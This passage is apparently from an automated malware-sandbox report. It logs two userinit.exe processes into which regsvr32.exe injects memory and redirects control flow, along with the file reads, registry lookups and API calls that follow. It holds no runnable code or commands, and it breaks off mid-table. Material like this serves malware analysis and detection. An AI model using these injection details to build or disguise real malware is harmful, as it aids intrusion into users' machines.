Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #55: userinit.exe

222

0

»

Information	Value
ID	#55
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:29, Reason: Child Process
Unmonitor	End Time: 00:03:33, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x998
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 994 0x 98C 0x B0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00130000	0x00130fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x0025ffff	Private Memory	rw	-
private_0x0000000000260000	0x00260000	0x0035ffff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x003dffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00537fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000540000	0x00540000	0x00640fff	Pagefile Backed Memory	r	-
private_0x0000000000650000	0x00650000	0x0074ffff	Private Memory	-	-
private_0x00000000007a0000	0x007a0000	0x007affff	Private Memory	rw	-
pagefile_0x00000000007b0000	0x007b0000	0x0088efff	Pagefile Backed Memory	r	-
private_0x0000000000890000	0x00890000	0x009dffff	Private Memory	rw	-
private_0x0000000000890000	0x00890000	0x0099cfff	Private Memory	rw	-
private_0x00000000009a0000	0x009a0000	0x009dffff	Private Memory	rw	-
pagefile_0x00000000009e0000	0x009e0000	0x00dd2fff	Pagefile Backed Memory	r	-
private_0x0000000000de0000	0x00de0000	0x00e60fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e64fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e68fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e6cfff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e70fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e74fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e78fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e7cfff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e80fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e84fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e88fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e8cfff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e90fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e94fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e98fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00e9cfff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00ea0fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00ea4fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00ea8fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00eacfff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00eb0fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00eb4fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00eb8fff	Private Memory	rw	-
private_0x0000000000de0000	0x00de0000	0x00ebcfff	Private Memory	rw	-
private_0x0000000000e10000	0x00e10000	0x00e4ffff	Private Memory	rw	-
userinit.exe	0x00ec0000	0x00ec8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000ed0000	0x00ed0000	0x01acffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01ad0000	0x023fffff	Memory Mapped File	r	-
private_0x0000000002400000	0x02400000	0x024fffff	Private Memory	rw	-
private_0x0000000002500000	0x02500000	0x026fffff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02782fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02786fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0278afff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0278efff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02792fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02796fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0279afff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0279efff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027a2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027a6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027aafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027aefff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027b2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027b6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027bafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027befff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027c2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027c6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027cafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027cefff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027d2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027d6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027dafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027defff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027e4fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027e8fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027ecfff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027f2fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027f6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027fafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027fefff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02804fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02808fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0280cfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c0fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028d6fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028dafff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028defff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028f4fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028f8fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028fcfff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x02900fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02916fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0291afff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0291ffff	Private Memory	-	-
private_0x00000000028d0000	0x028d0000	0x029b2fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029d0fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x02a12fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a32fff	Private Memory	rwx	-
private_0x0000000002a40000	0x02a40000	0x02b3ffff	Private Memory	-	-
private_0x0000000002c40000	0x02c40000	0x02d3ffff	Private Memory	rw	-
sortdefault.nls	0x02d40000	0x0300efff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd3008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x994, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = tð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #56: userinit.exe

222

0

»

Information	Value
ID	#56
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:30, Reason: Child Process
Unmonitor	End Time: 00:03:33, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x9b0
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 984 0x A88 0x 954

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	rw	-
oleaccrc.dll	0x00110000	0x00110fff	Memory Mapped File	r	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	rwx	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
pagefile_0x0000000000170000	0x00170000	0x00171fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00180000	0x00180fff	Memory Mapped File	r	-
private_0x00000000001a0000	0x001a0000	0x0029ffff	Private Memory	rw	-
pagefile_0x00000000002a0000	0x002a0000	0x00367fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x003dffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x00000000005e0000	0x005e0000	0x005effff	Private Memory	rw	-
private_0x00000000005f0000	0x005f0000	0x006effff	Private Memory	-	-
pagefile_0x00000000006f0000	0x006f0000	0x007cefff	Pagefile Backed Memory	r	-
private_0x00000000007d0000	0x007d0000	0x0094ffff	Private Memory	rw	-
private_0x00000000007d0000	0x007d0000	0x0084ffff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008d0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008d4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008d8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008dcfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008e8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008ecfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f0fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f4fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008f8fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x008fcfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00900fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00904fff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x00908fff	Private Memory	rw	-
